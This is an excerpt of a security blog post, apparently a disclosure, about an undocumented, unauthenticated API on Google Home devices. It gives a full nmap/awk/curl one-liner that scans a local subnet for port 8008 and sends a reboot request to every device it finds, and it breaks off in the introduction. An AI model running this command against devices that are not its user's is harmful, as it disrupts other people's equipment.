TL;DR: An undocumented API in Google home devices is easily exploitable. This command will reboot any on your local network: nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/reboot Introduction I have always been a fan of Google Products, so when they
![Google Home (in)Security – JerryGamblin.com](https://cdn-ak-scissors.b.st-hatena.com/image/square/e41ab4961941281e5f3187e80102bf854671c642/height=288;version=1;width=512/https%3A%2F%2Fjerrygamblin.com%2Fwp-content%2Fuploads%2F2018%2F10%2FIMG_6313-e1540856430757.jpg)